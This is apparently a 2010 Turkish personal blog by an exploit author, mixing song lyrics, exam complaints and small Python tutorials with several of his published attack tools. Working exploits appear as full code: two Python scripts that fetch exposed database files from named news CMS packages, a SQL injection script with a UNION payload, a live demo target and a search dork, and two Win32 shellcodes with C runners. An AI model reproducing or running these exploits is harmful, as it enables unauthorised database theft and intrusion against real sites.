vay vay vay doktor kardeşim süprizim var dedi ve bombayı patlattı :) yildirimordulari.org yakında online ama hack sitesi olarak değil farklı projelerimiz var bakalım ya nasip, kardeşim teşekkürler, yılların rüyasını gerçekleştirdin doktor ;)
/Ekip: Dr.Ly0n, LifeSteaLeR, ZoRLu
29 Ekim 2010 Cuma
26 Ekim 2010 Salı
str0ke a son mail / 08.08.2009
konu: Linux version 2.6.28-14-generic (gcc version 4.3.3 (Ubuntu 4.3.3-5ubuntu4) ) Kernel Memory Disclosure
kabul etmemişti hırt peşine bi resim gönderdim kanıt olarak, dediki tamamda yetki aşımı vs yok bu açık sayılmaz falan :D simdi resme baktım da linux yakıyor aga tema falan :D hey gidi günler hey gidi str0ke
25 Ekim 2010 Pazartesi
Numan Hadi - Dönmüyor
numan hadi dönmüyor | izlesene.com
dönmüyor dönmüyor sevdiğim dönmüyor
gitgide gelmiyor, sevdalım dönmüyor
dönmüyor dönmüyor sevdiğim dönmüyor
gitgide gelmiyor, sevdalım dönmüyor
yalnızım yalnızım bir bahtı karayım
bir kıza sevdalı yaralı adamım
23 Ekim 2010 Cumartesi
son bir hafta
haftaya pazar büyük gün(!) sınav giriş belgesi ulaştı elime :) dua edin arkadaşlar bu son şansımız. sınavın 31 ekimde olması da başka bir olay, tarihe bak a.q :D
11 Ekim 2010 Pazartesi
Özgür Akkuş / Gökhan Türkmen - Kayıp Şehir
dehşet bişey dinleyin pişman olmazsınız...
Ben gönlümü bir kere sana verdim
Ömrümü uğruna heder ettim
Son durak, liman seni seçtim
Vazgeçemiyorum..
Gururu, kibiri evde bıraktım
En yalın halimle sana aktım
Gözlerime bir kere ışık yaktın
Vazgeçemiyorum..
Öle öle en kayıp şehirde
Aşkımla sürgündeyim belkide
Sürüne sürüne tutsağım gözlerine..
Delice delice tutkunum sadece
Kızıyorum en zayıf halime sevsende
Sev Sevme umrumda değil..
Öle öle en kayıp şehirde
Aşkımla sürgündeyim belkide
Sürüne sürüne tutsağım gözlerine..
Delice delice tutkunum sadece
Kızıyorum en zayıf halime sevsende
Sev Sevme, Vazgeçemiyorum..
Ooof, sev sevme, Seni Seviyorum..
Gözlerim doluyor gecelerde
En yalın en küçük hecelerde
Dilimin ucuna geldiğinde
Söyleyemiyorum..
Zaman öyle akıp gidiyorken
Sana deli yüreğim biliyorken
Şeytan diyor ki dök dilinden
Söyleyemiyorum..
Öle öle en kayıp şehirde
Aşkımla sürgündeyim belkide
Sürüne sürüne tutsağım gözlerine..
Delice delice tutkunum sadece
Kızıyorum en zayıf halime sevsende
Sev Sevme umrumda değil..
Öle öle en kayıp şehirde
Aşkımla sürgündeyim belkide
Sürüne sürüne tutsağım gözlerine..
Delice delice tutkunum sadece
Kızıyorum en zayıf halime sevsende
Sev Sevme, Vazgeçemiyorum..
Ooof, sev sevme, Seni Seviyorum..
Ben gönlümü bir kere sana verdim
Ömrümü uğruna heder ettim
Son durak, liman seni seçtim
Vazgeçemiyorum..
Gururu, kibiri evde bıraktım
En yalın halimle sana aktım
Gözlerime bir kere ışık yaktın
Vazgeçemiyorum..
Öle öle en kayıp şehirde
Aşkımla sürgündeyim belkide
Sürüne sürüne tutsağım gözlerine..
Delice delice tutkunum sadece
Kızıyorum en zayıf halime sevsende
Sev Sevme umrumda değil..
Öle öle en kayıp şehirde
Aşkımla sürgündeyim belkide
Sürüne sürüne tutsağım gözlerine..
Delice delice tutkunum sadece
Kızıyorum en zayıf halime sevsende
Sev Sevme, Vazgeçemiyorum..
Ooof, sev sevme, Seni Seviyorum..
Gözlerim doluyor gecelerde
En yalın en küçük hecelerde
Dilimin ucuna geldiğinde
Söyleyemiyorum..
Zaman öyle akıp gidiyorken
Sana deli yüreğim biliyorken
Şeytan diyor ki dök dilinden
Söyleyemiyorum..
Öle öle en kayıp şehirde
Aşkımla sürgündeyim belkide
Sürüne sürüne tutsağım gözlerine..
Delice delice tutkunum sadece
Kızıyorum en zayıf halime sevsende
Sev Sevme umrumda değil..
Öle öle en kayıp şehirde
Aşkımla sürgündeyim belkide
Sürüne sürüne tutsağım gözlerine..
Delice delice tutkunum sadece
Kızıyorum en zayıf halime sevsende
Sev Sevme, Vazgeçemiyorum..
Ooof, sev sevme, Seni Seviyorum..
8 Ekim 2010 Cuma
mal bunlar :))
biraz önce exploit gönderdim explo(it)-db.com a mal bunlar a.q maili ZRL BGRHN diye almıştım direk o ada post edilmiş :)) ZRL BGRHN kim a.q yazmısım kocaman Author: ZoRLu diye :S vay a.q biz de kime gönderiyoruz exp falan bunlar bildiğin mal :D nerdesin str0ke :((
7 Ekim 2010 Perşembe
Nobel Akademi KPSS Eğitim Bilimleri Yaprak Test / Soru Bankası
kitabı çözünce eğitim sorularını fullerim düşüncesiyle alacaksanız almayın :P / onun formülü belli 10 bin dolarmış :S / piç kuruları
kitab konu çalışıp hemen peşine sorusunu çözerseniz pekiştirir çok salakça sorularda var ( buna sık sık rastlıyoruz ) çok düşündürücü güzel sorularda var ( buna nadir rastlıyoruz ) kötünün iyisi denebilir
Python Modül Downloader
python 2.5 / 2.6 için çok güzel bir uygulama ne diyor yeni nesil çok cix bi düşünce :PP
python 2.6 download:
http://www.python.org/ftp/python/2.6/python-2.6.msi
modül download for 2.6:
http://pypi.python.org/packages/2.6/s/setuptools/setuptools-0.6c11.win32-py2.6.exe
python 2.5 download:
http://www.python.org/ftp/python/2.5/python-2.5.msi
modül download for 2.5:
http://pypi.python.org/packages/2.5/s/setuptools/setuptools-0.6c11.win32-py2.5.exe
kurulum bittikten sonra pythonun kurulu olduğu dizine geliyoruz ben kendimden örnekle uyguluycam:
modüllere aşağıdaki adresten ulaşabilirsiniz:
http://pypi.python.org/simple/
python 2.6 download:
http://www.python.org/ftp/python/2.6/python-2.6.msi
modül download for 2.6:
http://pypi.python.org/packages/2.6/s/setuptools/setuptools-0.6c11.win32-py2.6.exe
python 2.5 download:
http://www.python.org/ftp/python/2.5/python-2.5.msi
modül download for 2.5:
http://pypi.python.org/packages/2.5/s/setuptools/setuptools-0.6c11.win32-py2.5.exe
kurulum bittikten sonra pythonun kurulu olduğu dizine geliyoruz ben kendimden örnekle uyguluycam:
cd \python26\Scripts
easy_install markup /
markup modülün adı siz hangi modülü yüklemek istiyorsanız onu yazıyorsunuz
easy_install ImageTk gibi gibi
modüllere aşağıdaki adresten ulaşabilirsiniz:
http://pypi.python.org/simple/
Toygar Işıklı - Sen eşittir ben
İzleyin: Toygar Işıklı - Sen Eşittir Ben
Gün karanlıksa etrafın bulanıksa
Kaderin sana düşmansa benden çok da farklı değilsin
Yağmura saygın sonsuzsa aşka hiç inanmıyorsan
Zorla günleri sayıyorsan aynı kişi bile olabiliriz
Eminim bi gün senle buluşup bişeyler içeceğiz
Hatta belki eskileri anacağız dertleşeceğiz
En sevdiğin şarkı yalansa hayatının filmi hayatsa
Bi de hayatın tümüyle yalansa karşılaşmamız an meselesi
Hayatının kitabı mutluluksa sardunyaları mırıldanıyorsan
Deniz görmeden yaşayamıyorsan sen eşittir ben demektir..
Gün yol almışsa efkârın omzundaysa
Gözyaşın sana düşmansa benden çok da farklı değilsin
Yağmura aşkın sonsuzsa kalbinde saklanıyorsan
Zorla günleri sayıyorsan aynı hüznü bile duyabiliriz
Eminim bi gün senle buluşup bişeyler içeceğiz
Hatta belki eskileri anacağız dertleşeceğiz
En sevdiğin şarkı yalansa hayatının filmi hayatsa
Bi de hayatın tümüyle yalansa karşılaşmamız an meselesi
Hayatının kitabı mutluluksa sardunyaları mırıldanıyorsan
Deniz görmeden yaşayamıyorsan sen eşittir ben demektir
6 Ekim 2010 Çarşamba
Sinek Oyunu / Python - Tkinter
Epeydir Tkinterle uğrasmıyodum unutmusum küçük bi pratik :P
işte kodlamada kullanacağımız sinek:
Ekran Görüntüsü:
Kodlarımız:
işte kodlamada kullanacağımız sinek:
Ekran Görüntüsü:
Kodlarımız:
#!/usr/bin/env python
#_*_coding:cp1254_*_
from Tkinter import *
import ImageTk, random
cam = Tk()
cam.geometry("400x400")
cam.tk_setPalette("black")
cam.title("Sinekli Bakkal")
cam.resizable(width=FALSE, height=FALSE)
def yakalayalim(event=None):
a = random.randint(0,300)
b = random.randint(0,300)
print a,b
puton.place(x=a,y=b)
resim = ImageTk.PhotoImage(file="sinek.jpg")
puton = Button(image=resim, command=yakalayalim, relief="flat")
puton.place(x=1,y=0)
puton.bind("",yakalayalim)
mainloop()
5 Ekim 2010 Salı
Pagerank ZoRgular
anca iki resim paylaşabildim fazla sorgulama yaptığım için site banladı sanırım :D basit bi kodlama iste ban kalkarsa baska görüntülerde eklerim :) Kullanıma dair diğer açıklamaları okumayı ihmal etmeyin
//Serefsiz Blogspot
blogspot kodları engelliyo isterseniz dosayı indirebilirsiniz
http://www.upload.gen.tr/d.php/s15/8tgvqbii/rank.rar.html
#!/usr/bin/env python
#-*- coding: cp1254 -*-
'''
Proje : Pagerank ZoRgular
Kodlama : ZoRLu
Site : http://z0rlu.blogspot.com
Site : http://inj3ct0r.com
Tarih : 05/10/2010
Sebep : Can Sıkıntısı :/
Dinlediğim Şarkı : http://www.youtube.com/watch?v=6Sa4rLt-WJA
Turkçe Karakter : Sorunun Çözümü için cmd penceresinde sağ tıkla > Özellikler > Yazı Tipi > Lucida Console Seç
Uyarı : Fazla Sorgulama Yapmayın Banlıyo Pezevenkler :))
Tesekkur : r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N
Python Version : 2.7 / http://python.org/ftp/python/2.7/python-2.7.msi
Lakirdi : Sınavınında ...
'''
import sys, urllib2, re, os, time
if len(sys.argv) < 2:
import os
os.system(['clear','cls'][1])
os.system('color 2')
os.system('chcp 1254')
print "\t_______________________________________________________________"
print " "
print " \t\tPagerank ZoRgular "
print " "
print " \t\tKullanım: "
print " "
print " \t\tpython %s siteniz.com" % os.path.basename(sys.argv[0])
print " "
print "\t_______________________________________________________________"
sys.exit(1)
sitemiz = sys.argv[1]
pagerankgentr = "http://www.pagerank.gen.tr"
path = "/@pagerank/"
url = pagerankgentr + path + sitemiz
print "\nZoRgulanıyor..."
time.sleep(1)
print "\nSite: %s"% os.path.basename(sys.argv[1]);
time.sleep(2)
try:
Pagerank = urllib2.urlopen(url).read()
Pagerankcek = re.findall(r"(.*)([0-9a-fA-F])(.*)
", Pagerank)
if len(Pagerankcek) > 0:
print "\nPagerank Değeriniz: " + Pagerankcek[0][0] + Pagerankcek[0][1]
time.sleep(1)
else:
print "\nPagerank Değeriniz Sorgulanamadı!"
sys.exit(1)
except urllib2.HTTPError:
print "Server Meşgul!"
sys.exit(1)
try:
Aciklama = urllib2.urlopen(url).read()
Aciklamacek = re.findall(r"Pagerank Değerinizin Açıklaması:
(.*)([0-9a-fA-F])(.*)", Aciklama)
if len(Aciklamacek) > 0:
print "\nPagerank Açiklaması: " + Aciklamacek[0][0] + Aciklamacek[0][1] + Aciklamacek[0][2]
time.sleep(1)
else:
print "\nAçıklama Sorgulaması Sorgulanamadı!"
except urllib2.HTTPError:
print "Server Meşgul!"
try:
Resim = urllib2.urlopen(url).read()
Resimcek = re.findall(r"if len(Resimcek) > 0:
print "\nKayitli Resim: \n\n" + Resimcek[0][0] + Resimcek[0][1] + Resimcek[0][2]
time.sleep(2)
print "\nZoRgulama Tamamlandı!"
else:
print "\nKayıtlı Resim Sorgulanamadı!"
except urllib2.HTTPError:
print "Server Meşgul!"
meyra - cemil demirbakan - beni sensiz düşünme
meyra & cemil demirbakan - beni sensiz düşünme | izlesene.com
Asıl benim canım yanmış
Nasıl da tadım kaçmış
Takıldım masum yüzüne
Akıl ver çare nerde
Meğer benim bildiklerim
Kağıttan duvarlarmış
Düştüm bir gizin eşine
Malesef çare sende
İstersen al beni götür demem nereye
Batmışım zaten artık en derine
Naparsan yap ama güven son sözüme
Beni sensiz düşünme
İstersen al beni götür demem nereye
Batmışım zaten artık en derine
Naparsan yap ama inan son sözüme
Beni sensiz düşünme
Seni bensiz düşünme
Asıl benim canım yanmış
Nasıl da tadım kaçmış
Takıldım masum yüzüne
Akıl ver çare nerde
İstersen al beni götür demem nereye
Batmışım zaten artık en derine
Naparsan yap ama güven son sözüme
Beni sensiz düşünme
İstersen al beni götür demem nereye
Batmışım zaten artık en derine
Naparsan yap ama inan son sözüme
Beni sensiz düşünme
Seni bensiz hiç düşünme...
Cilem Haber v1.4.4 (Tr) Database Disclosure Exploit (.py)
http://inj3ct0r.com/exploits/14356
http://packetstormsecurity.org/1010-exploits/cilemhaber-disclose.txt
http://www.exploit-db.com/exploits/15199
http://packetstormsecurity.org/1010-exploits/cilemhaber-disclose.txt
http://www.exploit-db.com/exploits/15199
#!/usr/bin/env python
#-*- coding:cp1254 -*-
'''
# Title : Cilem Haber v1.4.4 (Tr) Database Disclosure Exploit (.py)
# Down. Script : http://www.aspindir.com/indir.asp?id=3287&sIslem=%DDndir
# Proof : http://img718.imageshack.us/img718/7993/cilem.jpg
# Tested : Windows XP Professional sp3
# Author : ZoRLu / http://inj3ct0r.com/author/577
# mail-msn : admin@yildirimordulari.com
# Home : http://z0rlu.blogspot.com
# Thanks : http://inj3ct0r.com / http://www.exploit-db.com / http://packetstormsecurity.org / http://shell-storm.org
# Date : 04/10/2010
# Tesekkur : r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N
# Lakirdi : Dont Forget My Python Vers: 2.7
# Lakirdi : Nasil Kullanabilirsiniz Bu Acigi ? Oda Bende Kalsin :))
'''
import sys, urllib2, re, os, time
def indiriyoruz(url):
import urllib
aldosyayi = urllib.urlopen(url)
indiraq = open(url.split('/')[-1], 'wb')
indiraq.write(aldosyayi.read())
aldosyayi.close()
indiraq.close()
if len(sys.argv) < 2:
import os
os.system('cls')
os.system('clear')
os.system('color 2')
print "_______________________________________________________________"
print " "
print " Cilem Haber v1.4.4 (Tr) Database Disclosure Exploit (.py) "
print " "
print " coded by ZoRLu "
print " "
print ' usage: %s http://server.com/path/' % os.path.basename(sys.argv[0])
print " "
print "_______________________________________________________________"
sys.exit(1)
''' link kontrol 1 '''
add = "http://"
add2 = "/"
sitemiz = sys.argv[1]
if sitemiz[-1:] != add2:
print "\nnwhere is it: " + add2
print "okk I will add"
time.sleep(2)
sitemiz += add2
print "its ok" + " " + sitemiz
if sitemiz[:7] != add:
print "\nwhere is it: " + add
print "okk I will add"
time.sleep(2)
sitemiz = add + sitemiz
print "its ok" + " " + sitemiz
vulnfile = "db/cilemhaber.mdb"
url2 = sitemiz + vulnfile
''' link kontrol 2 '''
try:
adreskontrol = urllib2.urlopen(url2).read()
if len(adreskontrol) > 0:
print "\nGood Job Bro!"
except urllib2.HTTPError:
import os
import sys
print "\nForbidden Sorry! Server has a Security!"
sys.exit(1)
''' dosya indiriliyor '''
if __name__ == '__main__':
import sys
if len(sys.argv) == 2:
print "\nFile is Downloading\n"
try:
indiriyoruz(url2)
except IOError:
print '\nFilename not found.'
Abhimanyu Infotech (show_news.php id) SQL Injection Exploit
http://inj3ct0r.com/exploits/14357
http://packetstormsecurity.org/1010-exploits/abhimanyu-sql.txt
http://packetstormsecurity.org/1010-exploits/abhimanyu-sql.txt
#!/usr/bin/env python
#-*- coding:utf-8 -*-
'''
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ########################################### 1
0 I'm ZoRLu member from Inj3ct0r Team 1
1 ########################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
# Title : Abhimanyu Infotech (show_news.php id) SQL Injection Exploit (.py)
# Demo : http://soumyampl.com/index1.php?file=show_news.php&id=2 // has a lfi too :))
# Proof : http://img715.imageshack.us/img715/297/sqlo.jpg
# Tested : Windows XP Professional sp3
# Author : ZoRLu / http://inj3ct0r.com/author/577
# mail-msn : admin@yildirimordulari.com
# Home : http://z0rlu.blogspot.com
# Thanks : http://inj3ct0r.com / http://www.exploit-db.com / http://packetstormsecurity.org / http://shell-storm.org
# Date : 04/10/2010
# Tesekkur : r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N
# Lakirdi : Dont Forget My Python Vers: 2.7
# Lakirdi : Gecmiyorum Zaman a.k :/
# Dork : intext:"Designed" "Abhimanyu Infotech"
'''
import sys, urllib2, re, os, time
if len(sys.argv) < 2:
os.system('cls')
os.system('clear')
os.system('color 2')
print "_______________________________________________________________"
print " "
print " Abhimanyu Infotech SQL Inj Exploit (.py) "
print " "
print " Coded by ZoRLu "
print " "
print " Usage: "
print " "
print " python exploit.py http://site.com/path/ "
print " "
print "_______________________________________________________________"
sys.exit(1)
add = "http://"
add2 = "/"
sitemiz = sys.argv[1]
if sitemiz[-1:] != add2:
print "\nwhere is it: " + add2
print "okk I will add"
time.sleep(2)
sitemiz += add2
print "its ok" + " " + sitemiz
if sitemiz[:7] != add:
print "\nwhere is it: " + add
print "okk I will add"
time.sleep(2)
sitemiz = add + sitemiz
print "its ok" + " " + sitemiz
vulnfile = "show_news.php"
sql = "?id=0000+union+select+1,2,3,concat(0x3a3a3a,database(),0x3a3a3a)"
url = sitemiz + vulnfile + sql
print "\nExploiting...\n"
print "wait three sec.!\n"
time.sleep(3)
try:
veri = urllib2.urlopen(url).read()
aliver = re.findall(r":::(.*)([0-9a-fA-F])(.*):::", veri)
if len(aliver) > 0:
print "database(): " + aliver[0][0] + aliver[0][1] +aliver[0][2]
print "\nGood Job Bro!"
else:
print "Exploit failed..."
except urllib2.HTTPError:
print "Forbidden Sorry! Server has a Security!"
2 Ekim 2010 Cumartesi
seyfi doğanay - bul beni
ben yaralı ceylanım dağlarda
avcı olup düş peşime bul beni
kipriğini şu gönlüme ok eyle
sol yanımın üzerinden vur beni
alacaksan al canımı ses etmem
kıydın diye beni sana küs etmem
ben seversem kolay kolay pes etmem
boynum sana kıldan ince vur beni
bu nasıl bir sevda geldi başıma
aşılmaz dağlara saldın yar beni
gecemi gündüze kattım yollarda
kurda kuşa yem olmadan bul beni
alacaksan al canımı ses etmem
kıydın diye beni sana küs etmem
ben seversem kolay kolay pes etmem
boynum sana kıldan ince vur beni
Seyfi Doğanay
Bka Haber v1.0 (Tr) File Disclosure Exploit (.py)
http://www.exploit-db.com/exploits/15183/
#!/usr/bin/env python
#-*- coding:cp1254 -*-
'''
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ########################################### 1
0 I'm ZoRLu member from Inj3ct0r Team 1
1 ########################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
# Title : Bka Haber v1.0 (Tr) File Disclosure Exploit (.py)
# Desc. : its not Database
# Down. Script : http://www.scriptci.com/modules.php?name=Downloads&d_op=getit&lid=475
# Proof : http://img822.imageshack.us/img822/3568/filedisc.jpg
# Tested : Windows XP Professional sp3
# Author : ZoRLu / http://inj3ct0r.com/author/577
# mail-msn : admin@yildirimordulari.com
# Home : http://z0rlu.blogspot.com
# Thanks : http://inj3ct0r.com / http://www.exploit-db.com / http://packetstormsecurity.org / http://shell-storm.org
# Date : 02/10/2010
# Tesekkur : r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N
# Lakirdi : Dont Forget My Python Vers: 2.7
# Lakirdi : Okudugumuz icin Cezalandiran Sisteme Sarkitiyim / 3227 Orrospu Cocugu Yakinda Sinemalarda :P
# Lakirdi : off ulan off / http://www.youtube.com/watch?v=RV7Wj0KKVxo
'''
import sys, urllib2, re, os, time
def indiriyoruz(url):
import urllib
aldosyayi = urllib.urlopen(url)
indiraq = open(url.split('/')[-1], 'wb')
indiraq.write(aldosyayi.read())
aldosyayi.close()
indiraq.close()
if len(sys.argv) < 2:
import os
os.system('cls')
os.system('clear')
os.system('color 2')
print "_______________________________________________________________"
print " "
print " Bka Haber v1.0 (Tr) File Disclosure Exploit (.py) "
print " "
print " coded by ZoRLu "
print " "
print ' usage: %s http://server.com/path/' % os.path.basename(sys.argv[0])
print " "
print "_______________________________________________________________"
sys.exit(1)
''' link kontrol 1 '''
add = "http://"
add2 = "/"
sitemiz = sys.argv[1]
if sitemiz[-1:] != add2:
print "\nnwhere is it: " + add2
print "okk I will add"
time.sleep(2)
sitemiz += add2
print "its ok" + " " + sitemiz
if sitemiz[:7] != add:
print "\nwhere is it: " + add
print "okk I will add"
time.sleep(2)
sitemiz = add + sitemiz
print "its ok" + " " + sitemiz
vulnfile = "db/haber.mdb"
url2 = sitemiz + vulnfile
''' link kontrol 2 '''
try:
adreskontrol = urllib2.urlopen(url2).read()
if len(adreskontrol) > 0:
print "\nGood Job Bro!"
except urllib2.HTTPError:
import os
import sys
print "\nForbidden Sorry! Server has a Security!"
sys.exit(1)
''' dosya indiriliyor '''
if __name__ == '__main__':
import sys
if len(sys.argv) == 2:
print "\nFile is Downloading\n"
try:
indiriyoruz(url2)
except IOError:
print '\nFilename not found.'
1 Ekim 2010 Cuma
explo(it)-db.com
gönderiyorum maili post ediliyor bakıyorum onaylanmısta sonra hoba silindi hemen gönderdim bi mail dedim malmısınız olum bu ne gevşeklik :PP şakası bir yana gönderdiğim exploit, shellcode yada buglardan bazılarını tınmadılar bazılarını da post edip sonra sildiler 1,3,5 derken baktım böyle olmuyor gönderdim bir mail:
soru:
dedim nerde hata yapıyorum söyleyin biliyim önce yayınlayıp sonra silmenize sebep nedir lütfen yanlışımı bildirin düzeltmek istiyorum
el cevap:
seni şaşırttığımız için üzgünüz, herhangi bir hatanız yok biz bind shell, add admin account shell vs vs tarzında shellcode istiyoruz
// bununda tek bir açıklaması var am buldunuz kıllısını istiyorsunuz :/
// of str0ke nerdesin yav :((
soru:
dedim nerde hata yapıyorum söyleyin biliyim önce yayınlayıp sonra silmenize sebep nedir lütfen yanlışımı bildirin düzeltmek istiyorum
el cevap:
seni şaşırttığımız için üzgünüz, herhangi bir hatanız yok biz bind shell, add admin account shell vs vs tarzında shellcode istiyoruz
// bununda tek bir açıklaması var am buldunuz kıllısını istiyorsunuz :/
// of str0ke nerdesin yav :((
win32/xp sp3 (Tr) cmd.exe Shellcode 42 bytes
http://inj3ct0r.com/exploits/14298
http://packetstormsecurity.org/shellcode/win32cmd-shellcode.txt
http://shell-storm.org/shellcode/files/shellcode-710.php
http://packetstormsecurity.org/shellcode/win32cmd-shellcode.txt
http://shell-storm.org/shellcode/files/shellcode-710.php
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ########################################### 1
0 I'm ZoRLu member from Inj3ct0r Team 1
1 ########################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
# Title : win32/xp sp3 (Tr) cmd.exe Shellcode 42 bytes
# Proof : http://img36.imageshack.us/img36/1183/cmdm.jpg
# Plat. : win32 / windows
# Author : ZoRLu / http://inj3ct0r.com/author/577
# mail-msn : admin@yildirimordulari.com
# Home : http://z0rlu.blogspot.com
# Thanks : http://inj3ct0r.com / http://www.exploit-db.com / http://packetstormsecurity.org / http://shell-storm.org
# Date : 01/10/2010
# Tesekkur : r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N
# Lakirdi : Okudugumuz icin Cezalandiran Sistemin amina koyim / Kpss Anani ...
# Lakirdi : Son 31 Gun
#include
#include
#include
int main(){
unsigned char shellcode[]=
"\x31\xc0\xeb\x13\x5b\x88\x43\x0e\x53\xbb\xad\x23\x86\x7c\xff\xd3\xbb"
"\xfa\xca\x81\x7c\xff\xd3\xe8\xe8\xff\xff\xff\x63\x6d\x64\x2e\x65\x78"
"\x65\x20\x2f\x63\x20\x63\x6d\x64";
printf("Size = %d bytes\n", strlen(shellcode));
((void (*)())shellcode)();
return 0;
}
win32/xp sp3 (Tr) About Box Shellcode 77 bytes
http://inj3ct0r.com/exploits/14270
http://packetstormsecurity.org/shellcode/winabout-shellcode.txt
http://www.exploit-db.com/exploits/15170/
http://packetstormsecurity.org/shellcode/winabout-shellcode.txt
http://www.exploit-db.com/exploits/15170/
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ########################################### 1
0 I'm ZoRLu member from Inj3ct0r Team 1
1 ########################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
# Title : win32/xp sp3 (Tr) About Box Shellcode 77 bytes
# Proof : http://img707.imageshack.us/img707/2276/infoja.jpg
# Plat. : win32
# Author : ZoRLu / http://inj3ct0r.com/Author/577
# mail-msn : admin@yildirimordulari.com
# Home : http://z0rlu.blogspot.com
# Date : 30/09/2010
# Tesekkur : r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N
# Lakirdi : Genclik Gidin Kahvede Batak, Pispirik, Okey vs Oynayin ama Okumayin amina koyim / Kpss Anani ...
# Lakirdi : Son 32 Gun
#include
#include
#include
int main(){
unsigned char shellcode[]=
"\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x2b\x53\xbb\xad\x23\x86\x7c"
"\xff\xd3\x31\xc0\x50\xbb\xfa\xca\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff"
"\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x52\x55\x4e\x44\x4c\x4c"
"\x33\x32\x2e\x45\x58\x45\x20\x73\x68\x65\x6c\x6c\x33\x32\x2c\x53\x68"
"\x65\x6c\x6c\x41\x62\x6f\x75\x74\x41";
printf("Size = %d bytes\n", strlen(shellcode));
((void (*)())shellcode)();
return 0;
}
# Inj3ct0r.com [2010-09-30]
Kaydol:
Kayıtlar (Atom)
